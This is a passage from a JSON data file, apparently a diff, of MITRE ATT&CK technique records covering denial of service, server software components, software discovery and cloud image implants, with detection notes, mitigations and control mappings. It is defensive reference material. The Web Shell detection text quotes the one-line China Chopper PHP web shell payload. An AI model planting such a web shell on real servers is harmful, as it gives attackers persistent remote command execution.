such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1498.002", + "name": "Network Denial of Service: Reflection Amplification", + "url": "https://attack.mitre.org/techniques/T1498/002", + "description": "Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)\n\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)", + "detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "cumulative_score": 0.2426380952380952, + "adjusted_score": 0.2426380952380952, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "7.6" + ], + "nist_controls": [ + "AC-3", + "AC-4", + "CA-7", + "CM-6", + "CM-7", + "SC-7", + "SI-10", + "SI-15" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1499", + "name": "Endpoint Denial of Service", + "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nIn cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\n\nFor attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\n", + "url": "https://attack.mitre.org/techniques/T1499", + "tactics": [ + "Impact" + ], + "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.", + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Sensor Health: Host Status" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1499.001", + "name": "Endpoint Denial of Service: OS Exhaustion Flood", + "url": "https://attack.mitre.org/techniques/T1499/001", + "description": "Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.\n\nDifferent ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\n\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)", + "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1499.002", + "name": "Endpoint Denial of Service: Service Exhaustion Flood", + "url": "https://attack.mitre.org/techniques/T1499/002", + "description": "Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\nOne example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)\n\nAnother variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)", + "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1499.003", + "name": "Endpoint Denial of Service: Application Exhaustion Flood", + "url": "https://attack.mitre.org/techniques/T1499/003", + "description": "Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)", + "detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1499.004", + "name": "Endpoint Denial of Service: Application or System Exploitation", + "url": "https://attack.mitre.org/techniques/T1499/004", + "description": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.", + "detection": "Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "cumulative_score": 0.28464285714285714, + "adjusted_score": 0.28464285714285714, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.2,7.6,7.7" + ], + "nist_controls": [ + "AC-3", + "AC-4", + "CA-7", + "CM-6", + "CM-7", + "SC-7", + "SI-10", + "SI-15", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1505", + "name": "Server Software Component", + "description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.", + "url": "https://attack.mitre.org/techniques/T1505", + "tactics": [ + "Persistence" + ], + "detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.\n\nProcess monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "File: File Creation", + "File: File Modification", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1505.001", + "name": "Server Software Component: SQL Stored Procedures", + "url": "https://attack.mitre.org/techniques/T1505/001", + "description": "Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).\n\nAdversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) \n\nMicrosoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) ", + "detection": "On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1505.002", + "name": "Server Software Component: Transport Agent", + "url": "https://attack.mitre.org/techniques/T1505/002", + "description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. ", + "detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1505.003", + "name": "Server Software Component: Web Shell", + "url": "https://attack.mitre.org/techniques/T1505/003", + "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) ", + "detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\n\nFile monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)\n\nLog authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1505.004", + "name": "Server Software Component: IIS Components", + "url": "https://attack.mitre.org/techniques/T1505/004", + "description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)\n\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)\n\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)", + "detection": "Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\\system32\\inetsrv\\config\\applicationhost.config could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)\n\nMonitor execution and command-line arguments of AppCmd.exe, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.7369090251752382, + "adjusted_score": 0.7369090251752382, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.7,4.1,4.7,5.3,5.4,6.1,6.2,18.3,18.5" + ], + "nist_controls": [ + "AC-16", + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-8", + "CM-11", + "CM-2", + "CM-5", + "CM-6", + "CM-8", + "IA-2", + "RA-5", + "SA-10", + "SA-11", + "SC-16", + "SI-14", + "SI-4", + "SI-7", + "SR-11", + "SR-4", + "SR-5", + "SR-6" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1518", + "name": "Software Discovery", + "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).", + "url": "https://attack.mitre.org/techniques/T1518", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Firewall: Firewall Enumeration", + "Firewall: Firewall Metadata", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1518.001", + "name": "Software Discovery: Security Software Discovery", + "url": "https://attack.mitre.org/techniques/T1518/001", + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.", + "mitigations": [] + } + ], + "mitigations": [], + "cumulative_score": 0.2271032676380952, + "adjusted_score": 0.2271032676380952, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1525", + "name": "Implant Internal Image", + "description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n\nA tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)", + "url": "https://attack.mitre.org/techniques/T1525", + "tactics": [ + "Persistence" + ], + "detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.\n\nIn containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. ", + "platforms": [ + "Containers", + "IaaS" + ], + "data_sources": [ + "Image: Image Creation", + "Image: Image Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "cumulative_score": 0.41089490730285716, + "adjusted_score": 0.41089490730285716, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-8", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "IA-9", + "RA-5", + "SI-2", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1526", + "name": "Cloud Service Discovery", + "description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, 